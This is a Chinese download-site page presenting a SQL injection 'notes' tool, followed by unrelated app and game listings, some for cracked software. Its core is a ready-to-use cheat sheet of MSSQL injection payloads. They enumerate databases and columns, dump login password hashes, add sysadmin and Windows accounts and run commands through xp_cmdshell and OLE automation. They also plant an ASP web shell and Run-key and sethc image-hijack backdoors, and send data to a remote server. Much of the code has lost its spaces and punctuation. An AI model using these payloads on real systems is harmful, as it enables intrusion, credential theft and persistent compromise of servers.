菲哥哥注入语句笔记是一款sql注入工具,它可以注入一些要注意的东西,Sql注射经验,写成笔记了。全网VIP视频解析播放工具-07soVIP视频播放器1.0 官方免费版
1.爆所有库名
+union+select+name,filename,3,4,5+from+master.dbo.sysdatabases
//name数据库名filename数据库物理路径
+union+select+name,filename,3,4,5+from+master.dbo.sysdatabases+where+and+dbid=x+filename>0
//爆破数据库路径换dbid值就可以

+union+select+1,(select+name+from+master.dbo.sysdatabases+for+xml+path),3,4,5–
and0<>db_name(n)–
n改成0,1,2,3……就可以跨库
2.爆所有表名
+union+select+table_name,2,3,4,5+TABLE_CAtalog,table_schema+from+information_schema.tables–
//table_catalo保存当前数据库名称,table_name保存当前数据库中所有表
+select+name,id,crdate,4,5+from+数据库名.dbo.sysobjects+where+xtype=’u.+and+status>=0–
//name表名id表的idxtype=’u’u代表用户自定义的表crdate为数据库的创建时间ststus>=0
/+union+select+name,object_id,3,4,5+fromsys.tables–
3.爆所有字段名
+union+select+name,id,3,4,5+from+数据库名称.dbo.syscolumns+where+xtype=167+and+id=5575058–
//id是在爆破表名时候的id值syscolumns中的id和sysobjects中的id主外键关系
+union+select+name+from+syscolumns+where+charindex(‘pass’,name)>0
//查询含有“pass”的字段
+union+SELECTname,2,3,4,5FROMsyscolumnsWHEREid=(SELECTidFROMsysobjectsWHEREname=‘yixiang_bizre’)
//查询yixiang_bizre表中的所有字段
+union+select+table_name,column_name,3,4,5+from+information_schema.COLUMNS–
//table_name表名称column_name字段名
4.添加用户
1、declare@oint;
2、execmaster..sp_oacreate'Shell.Application',@oout;
3、execmaster..sp_oamethod@o,'ShellExecute',NULL,'cmd.exe','/cnetuserfuckfuck/add
5.判断是不是SQL库
andexists(select*fromsysobjects)
6.所有账户名
+union+select+(selectname+’||’+password_hashfrom+sys.sql_loginsforxmlpath),2,3,4,5+from+sys.sql_logins//
7.加SQL账户
1、--创建个登陆mssql的帐号
2、;execmaster.dbo.sp_addloginname,pass;--
3、--把创建的mssql登陆帐号提升到sysadmin
4、;execmaster.dbo.sp_addsrvrolemembername,sysadmin;--
8.启动组写入命令行和执行
EXECmaster.dbo.xp_regwrite‘HKEY_LOCAL_MACHINE’,’SOFTWAREMicrosoftWindowsCurrentVersionRun’,’help1′,’REG_SZ’,’cmd.exe/cnetusertestptlove/add’-
9.LCX语句
;execmaster..xp_cmdshell‘D:m目录lcx.exe-slave本机ip51目标内网ip3389′–
//目标机器执行
lcx.exe-listen512007
//本机执行连接本机的的2007端口就可以了
10.win200爆目录
xp_regread读取HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesW3SVCParametersVirtualRoots–
//获取WEB路径
11.恢复xp_cmdshell
;EXECmaster.dbo.sp_addextendedproc‘xp_cmdshell’,’e:inetpubwwwrootxplog70.dll’
//把xplog70.dll文件给他上传到e:inetpubwwwroot目录下了
12.open数据
insertintoOPENROWSET(‘SQLOLEDB’,‘server=ip;uid=user;pwd=123456!’,‘selectcfromcmd’)selectusernamefromtest
//把test是本地表,中username的值插入到远程cmd表中的c字段里
13.判断权限
1、+and+1=(select+IS_SRVROLEMEMBER('sysadmin'))--
2、//sa权限
3、and(selectIS_MEMBER('db_owner'))=1-- // dbo
4、and(selectIS_MEMBER('public'))=1-- //public
14.DIR目录
遍历系统的目录结构,分析结果并发现WEB虚拟目录,先创建一个临时表:
temphttp://www.XXXX.com/FullStory.asp?id=1;createtabletemp(idnvarchar(255),num1nvarchar(255),num2nvarchar(255),num3nvarchar(255));
–接下来:我们可以利用xp_availablemedia来获得当前所有驱动器,并存入temp表中:http://www.XXXX.com/FullStory.asp?id=1;inserttempexecmaster.dbo.xp_availablemedia;–?我们可以通过查询temp的内容来获得驱动器列表及相关信息或者利用xp_subdirs获得子目录列表,并存入temp表中:http://www.XXXX.com/FullStory.asp?id=1;insertintotemp(id)execmaster.dbo.xp_subdirs‘c:’;–?
我们还可以利用xp_dirtree获得所有子目录的目录树结构,并寸入temp表中:http://www.XXXX.com/FullStory.asp?id=1;insertintotemp(id,num1)execmaster.dbo.xp_dirtree‘c:’;–
这样就可以成功的浏览到所有的目录(文件夹)列表?如果我们需要查看某个文件的内容,可以通过执行xp_cmdsell:;insertintotemp(id)execmaster.dbo.xp_cmdshell‘typec:webindex.asp’;–?
使用’bulkinsert’语法可以将一个文本文件插入到一个临时表中。
如:bulkinserttemp(id)from‘c:inetpubwwwrootindex.asp’浏览temp就可以看到index.asp文件的内容了!通过分析各种ASP文件,可以得到大量系统信息,WEB建设与管理信息,甚至可以得到SA帐号的连接密码。
15.判断站库分离
+and+host_name()==@@servername-- //判断站库是否分离
16.存储总结
xp_availablemedia显示系统上可用的盘符’C:’xp_availablemedia
xp_enumgroups列出当前系统的使用群组及其说明xp_enumgroups
xp_enumdsn列出系统上已经设置好的ODBC数据源名称xp_enumdsn
xp_dirtree显示某个目录下的子目录与文件架构xp_dirtree‘C:inetpubwwwroot’
xp_getfiledetails获取某文件的相关属性xp_getfiledetails‘C:inetpubwwwroot.asp’
dbp.xp_makecab将目标计算机多个档案压缩到某个档案里所压缩的档案都可以接在参数的后面用豆号隔开
dbp.xp_makecab’C:lin.cab’,’evil’,1,’C:inetpubmdb.asp’
xp_unpackcab解压缩xp_unpackcab‘C:hackway.cab’,’C: emp’,1
xp_ntsec_enumdomains列出服务器域名xp_ntsec_enumdomains
xp_servicecontrol停止或者启动某个服务xp_servicecontrol‘stop’,’schedule’
xp_terminate_process用pid来停止某个执行中的程序xp_terminate_process123
dbo.xp_subdirs只列某个目录下的子目录dbo.xp_subdirs‘C:’
17.判断xp_cmdshell
+and+1=(select+count(*)+FROM+master.dbo.sysobjects+where+xtype+=‘X’+AND+name+=‘xp_cmdshell’)
18.判断系统为win2003
And+charindex('5.3',@@verisdn)
19.echo写shell
;execmaster.dbo.xp_cmdshell'echo^<scriptlanguage=VBScriptrunat=server^>executerequest^("^)^</script^>>c:\mu.asp'-
20.停掉服务
execmaster..xp_servicecontrol‘stop’,’schedule’
execmaster..xp_servicecontrol‘start’,’schedule’
有多少删减。另外添加几句个人经常用到的SQL注入和提权的语句
当xp_cmshell被删除或者无法使用的情况,我们不妨试试利用SP_OACreate和SP_OAMETHOD调用系统wscript.shell执行系统命令。
Declare@runshellINT
ExecSP_OACreate‘wscript.shell’,@runshellout
ExecSP_OAMeTHOD@runshell,’run’,null,’netuserlengflengf/add’
当这些都失败了,试试关闭系统沙盒模式,它在注册表的位置是
HKEY_LOCAL_MACHINESoftwareMicrosoftJet4.0EngineSandBoxMode
默认键值为2,即只在Access的模式下开启沙盒模式,对应的键值是
0—在任何所有者中禁止启用安全模式
1–为仅在允许范围内
2–必须在access模式下
3–完全开启
我们要将其设置为0就可以关闭了,通过SQL语句实现
Execmaster.dbo.xp_regwrite‘HKEY_LOCAL_MACHINE,’SoftwareMicrosoftJet4.0Engine’,’SandBoxMode’,’REG_DWORD’,0
执行关闭成功后就可以执行系统命令
select*fromOpenRowSet(‘Microsoft.Jet.OLEDB.4.0′,’;DataBase=c:windowssystem32iasias.mdb’,’selectshell(“netuserlengflengf/add”)’)
上面是提权思路。另外提下两种备份:
(1)Log备份(hta)
alertdatabase[dbname]setRECOVERYFULL–
createtablecmd(aimage)–
backuplog[dbname]todisk=’c:hta’withinit–
insertintocmd(a)values(‘[command]‘)–
backuplog[dbname]todisk=’系统启动目录hello.hta’–
droptablecmd–
(2)差异备份
backupdatabase[dbname]todisk=’c:db.bak’–
createtablecmd(cmdimage)–
insertintocmd(cmd)values(‘[command]‘)–
backupdatabase[dbname]todisk=’系统启动目录hello.hta’WITHDIFFERENTIALFORMAT–
droptablecmd–
经验告诉我,将你要执行的command转换成十六进制成功率会比较高,但是这个比较被动。
另外就是可以通过注册表添加run启动项添加用户命令,这种也是被动,要等服务器重启。
看了这个工具,觉得还缺少一个很使用的方法,那就是映像劫持,位于注册表位置:
HKEY_LOACAL_MACHINESoftwareMicrosoftWindowsNTCurrentVersionImageFileExecutionOptions
在这个键下面有一个Debugger的参数,如果不为空,就会处理。添加映像劫持方法的SQL语句如下:
execMaster.dbo.xp_regWrite‘HKEY_LOACAL_MACHINE’,’Software\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\sethc.exe’,’debugger’,’REG_SZ’,’c:windowssystem32cmd.exe’
展开内容
ppt2010破解版下载-powerpoint2010官方下载免费完整破解版
柠檬树下大语文客户端下载-柠檬树下大语文app1.0.0 安卓版
暗黑萌神2下载-暗黑萌神Ⅱ手游1.0.50 最新版
掌上音乐播放器下载-掌上音乐app1.0.1 安卓版
剑与荣耀百度版下载-剑与荣耀手游百度客户端1.0 安卓版
驾校模拟器2024最新版免费下载-驾校模拟器2024汉化破解版3.10.3 免广告版
Tasty Planet 下载-Tasty Planet(灰尘吞噬怪)1.8.1 ios免费版
跃迁旅人bilibili版下载-跃迁旅人B服版2.2.2 哔哩哔哩版
喔喔开黑app下载-喔喔开黑安卓版1.0.0 手机版
优宠快报app1.0 免费版
TL软件库下载-TL软件库app2.0 安卓版
神奇三国0.1折版下载-神奇三国0.1折三国无双1.0.1 送满VIP
进击吧三国2台版下载-进击吧三国2台服1.25最新版
鄂尔多斯市中心医院app下载-鄂尔多斯市中心医院app1.6官方ios版【内蒙古自治区首家手机医院APP】
大国战九游版2.0.0安卓版
新海医疗器械管理软件下载-新海医疗器械管理软件1.42 官方版
桌上学园三国杀下载-桌上学园三国杀最新版1.2.2 最新版
新星音频格式转换工厂免费版下载-新星音频格式转换工厂官方版8.2.3.0 最新版
肥多多软件2.0.16 安卓版
无忧系统助手官网下载-无忧系统助手5.8.1 【自动一键重装】官方通用版
物联宝车销软件下载-物联宝车销app3.79 安卓版
恐怖奶奶我的世界模组下载安装-恐怖奶奶我的世界模组下载y1.8.1 安卓版
真我手机灵动岛下载-realme真我灵动岛2.0.3 安卓版
逆转裁判3(附带GBA模拟器)免安装绿色中文版
9.1/470.5M
神之亵渎-类魂平台动作神作,渎神是类银河恶魔城游戏,难度偏向类魂。艺术风格可谓是独具一格,加上宗教背景,极其出彩。叙事偏向碎片化,不过大概的主线依然是很清晰的。...
7.9/703.8M
龙族幻想是一款角色冒险手游,可以组建联盟,超真实的物理引擎,角色动作非常的流畅,自由度非常的高,造型非常的绚丽,真实的战力的体验。龙族幻想手游介绍龙族幻想游戏获...
7.9/1,518.3M
GIF录制助手(GIF动画录制工具)是一款绿色免费的国内少有的录制屏幕成GIF动画制作软件。软件功能强大,录制出来的画质清晰,文件较小,便于传输和存储。软件界面...
火星情报局第三季薛之谦表情图片下载-火星情报局3薛之谦表情包完整免费版
9.3/8.9M
火星情报局第三季已经正式回归了,这次你们的谦谦升副局长了呀,还是一如既往的无厘头搞笑,小编为各位小伙伴带来火星情报局3薛之谦表情包,喜欢的话就来下载斗图吧!火星...
7.5/384.2M
乐助app在我们的日常生活中总是会遇到这种或是那种自己不知道怎么去解决的问题的时候,自己是不知道怎么办,那么你就需要给自己的手机上安装下面的这款乐助app了!乐...
迷你桌面SideSlide4.0.00 Beta 2 免费版
8.1/1,516.1M
迷你桌面SideSlide是一款非常实用的桌面工具,你可以简单地拖拽快捷方式到工作区,创建用于组织你的内容的容器并且可以使用背景图像和颜色完全定...
9.5/624.4M
人生重来模拟器是一款充满趣味和挑战的人生模拟游戏。玩家可以在游戏中体验不同的人生故事,解锁各种结局,锻炼自己的决策能力,感受人生的无常。快来加入人生重来模拟器,...
8.2/204.4M
水浒群英传是一款非常好玩的手机游戏,这款游戏由4大名著之一《水浒传》改编,游戏带你穿越历史替天行道,重振我水浒雄威!而且这款游戏活动多多!福利不断。游戏介绍穿越...
8.1/930.0M
教主之家礼包版手游是一款设计独特的手机游戏,游戏里有着丰富的玩法,玩家可以和其他伙伴一起在梦幻般的仙境世界里开启修仙的历练之旅,养成宠物和坐骑,塑造自己的角色还...
鲨鱼攻击模拟器游戏下载-鲨鱼攻击模拟3d手机版2.1 安卓版
8.4/844.9M
真实的模拟鲨鱼在海滩上面攻击的画面,这个是让玩家变成鲨鱼的游戏,玩家需要控制鲨鱼,同时鲨鱼也是需要避开各种猎人的枪,这个是要玩家的操作能力!鲨鱼攻击模拟3d手机...
无线网络分析工具-无线网络分析软件(Acrylic Wi-Fi Free)2.3.5652.32360 官方最新版
7.5/1,342.3M
无线网络分析软件(AcrylicWi-FiFree)是一个轻量级的实用程序,帮助监视你附近的wifi无线网络并将它们存储起来,用于扫描Wi-Fi接入点和连接的设...
Restorator 2018激活版下载-Restorator 2018绿色版3.90.179 中文特别版
7.6/294.4M
Restorator2018绿色版是一个破解激活的版本,下载后解压打开就能免费用,而且是中文的界面,需要官方版的,小编也提供了安装程序和注册码,可自行激活,支持...
珍爱生命远离毒品作文1000字-珍爱生命远离毒品作文大全(18份)doc格式免费下载【word】
7.6/1,899.0M
各位青少年们,心理还没有成熟,很容易被外界所影响,特别是一些上网、吸毒对于青少年来说,有很大的诱惑。各位老师、家长们要做好防范措施,对同学们进行各种珍爱生命,远...
易小学app下载-倍速点读(易小学软件)1.0.0 最新安卓版
8.9/1,036.3M
寓教于乐,快乐学习,易小学app主要是针对小学生打造的一款软件,丰富有趣的课程,多样化的学习方式,知识能力一起学,让学习看得见。倍速点读(易小学软件)介绍易小学...
春天XYC主程序修改器-春天XYC主程序隐藏修改器1.0.0 最新版【三国群英2mod修改器】
8.6/1,941.6M
这个是三国群英2的mod修改器,可以直接修改相关数据,并且还可以查看每一个角色的人物属性情况,每一个技能都可以轻松了解,pk对决的时候可以更加有把握战胜敌人!春...
8.8/1,177.3M
圣斗士传说1.47地图是一张非常好玩的魔兽生存地图,新版本更改白羊宫试炼首领死亡直接过关,更改被攻击自动旋转逃跑等等,喜欢的朋友们可以下载体验!地图信息地图名字...
小购物淘宝京东山寨版下载-小购物app3.6.2 安卓免费版
8.8/1,315.1M
小购物app是一款将淘宝和京东融为一体的工具软件,不用下载两个app,,而且可以快速的进行切换,非常适合网购的朋友使用,支持口令解析,还能分享哟,功能很全面的。...
logo设计软件中文版-Logo设计软件(Logo Design Studio)3.5.0 绿色免费版
8.8/158.4M
一个好看的Logo能够为一个品牌带来更多的关注,Logo设计软件(LogoDesignStudio)作为一款非常专业的Logo设计软件,简单的操作界面和使用方法...
reqable安卓下载-reqable抓包2.4.1 官方版
9.0/540.8M
reqable是一款非常好用的抓包工具,又不会抓包的朋友不用担心,这款软件甚至还自带了详细的抓包教程,帮助你完成各种抓包需求,以及HTTP开发和调试操作,软件界...
9.8/392.4M
在win7下mac地址修改不如xp方便,因为win7是一个相对于xp来说更加方便的上网的系统,mac地址如果随便修改可能引起不能上网了。MAC修改器只适用于Wi...
9.1/989.5M
七个英雄的征途2.0.3是一张十分好玩的剧情rpg类型的地图,非常多的英雄人物角色可以选择,讲述了七个英雄的故事,新版本更新了更多玩法,可玩性十分高!七个英雄的...
9.1/359.0M
这是一个省钱购物类型的软件平台,通过这个app你可以快速领取各种优惠券,支持淘宝,天猫等等平台,包括母婴产品,生活用品,宠物用品这里都可以买到!软件介绍一款主打...
凹凸世界寻光之旅下载-寻光之旅手游凹凸世界2.0.40 最新版
8.2/1,780.7M
凹凸世界IP新作,这个版本是测试版本,后续关注本页面,正式服会持续更新,大家需要有测试资格才可以玩这个版本的,这是一款多角色剧情线POV叙事的2D卡牌养成类手游...
儿童节ppt模板免费下载-2017儿童节ppt模板素材高清完整版
8.4/1,783.8M
2017儿童节ppt模板素材适用于儿童节的教育,儿童节的庆典,是一款mainframe而且可爱清新的模板,儿童节快到了,大孩子们是不是也要考虑过个节日呢。图片预...
陕西省榆林市2017年高考数学一模答案-陕西省榆林市2017年高考数学一模试卷及答案完整解析版
7.9/1,483.5M
眼看着离高考还有两个月,对于高三学子来说可不止两个月。考试已经成为同学们的家常便饭了,但是同学们最怕的也是考试。下面是小编为大家带来的一份陕西省榆林市2017年...